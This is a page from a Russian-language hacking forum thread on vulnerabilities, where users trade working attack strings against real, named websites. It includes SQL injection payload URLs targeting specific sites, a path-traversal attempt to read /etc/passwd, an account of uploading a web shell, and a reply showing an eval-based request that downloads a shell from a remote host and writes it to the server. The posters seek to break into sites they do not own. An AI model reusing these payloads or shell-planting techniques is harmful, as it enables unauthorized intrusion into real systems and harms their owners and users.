Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. loskstyle

    loskstyle Banned

    Joined:
    2 Jul 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Но работает он только в версии с "suid".
     
  2. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Del msg
     
    #20682 Zed0x, 2 Jul 2012
    Last edited: 13 Jan 2014
  3. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Del msg
     
    #20683 Zed0x, 2 Jul 2012
    Last edited: 13 Jan 2014
  4. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    сори у меня чет в мозиле не было хз почему ))
    а в хроме есть
     
  5. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    http://logvinov.info/about/0/0/0/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1
     
  6. Rootz

    Rootz Banned

    Joined:
    1 Jul 2012
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber :)
     
  7. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    558
    Likes Received:
    289
    Reputations:
    42
    Основы тут. Далее сам сообразишь, нужны начальные знания синтаксиса СУБД.
     
  8. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Нашел на неком сайте LFI

    Code:
     http://******.ru/book_php.php?id=adminpidaras.php 
    Пытаюсь крутить

    Code:
     http://******.ru/book_php.php?id=../../../../../../../../../../../../../../../../../../../etc/passwd 
    Поставляю %00, и все-равно ошибка.
    Подскажите что я делаю не так?
     
  9. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    нулл-байт тут не при чём. В самом конфиге апача прописано куда можно ходить.
     
  10. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://www.novstan.ru/search/?str=%')or(1)group%2F%2A%2A%2Fby(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))%23
     
    _________________________
    4 people like this.
  11. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Не Apache, а PHP
     
    1 person likes this.
  12. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    209
    Likes Received:
    279
    Reputations:
    32
    http://www.serdan.com/html/i_portals/index.php?p_origin=internal&p_name=content&p_id=MI-91
    Оракл, я не силен
     
  13. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Там нет иньекции! Нашел на поддомене.
    PHP:
    http://intranet.serdan.com.co/DATAofertas/index.php?perfilId=2 union all select null,null,null,null-- 
    Version:
    User:
    Database:
     
    2 people like this.
  14. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Залил мини шелл. Все ок. PHPINFO показывает.

    Делаю запрос
    Ничего не показывает. Начал гуглить... Перекодировал адрес сайта в BASE64.
    Опять нет шелла(

    allow_url_fopen On
    allow_url_include Off
    file_uploads On
     
  15. КOT

    КOT Banned

    Joined:
    14 Jun 2012
    Messages:
    26
    Likes Received:
    6
    Reputations:
    2
    :confused:
     
  16. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Сделал так

    PHPINFO выводит через Base64, а шелл не льется опять :mad:
     
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to aydin-ka
    Если я правильно тебя понял, то $a = eval($_GET['a']);
    Code:
    http://site.com?index.php?a=file_put_contents("shell.php", file_get_contents("http://site/shell.txt")); 
     
    1 person likes this.
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Изучи вот эти два топика:
    Должны помочь разобраться в твоем вопросе и болие.
     
    _________________________
    1 person likes this.
  19. WTSBugzoff

    WTSBugzoff New Member

    Joined:
    23 Jun 2011
    Messages:
    59
    Likes Received:
    2
    Reputations:
    0
    Подскажите как в vbulletin'е узнать название колонок и таблиц?
     
  20. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94

    1. С помощью SQL инъекции
    2. С помощью коннекта к БД
     
Thread Status:
Not open for further replies.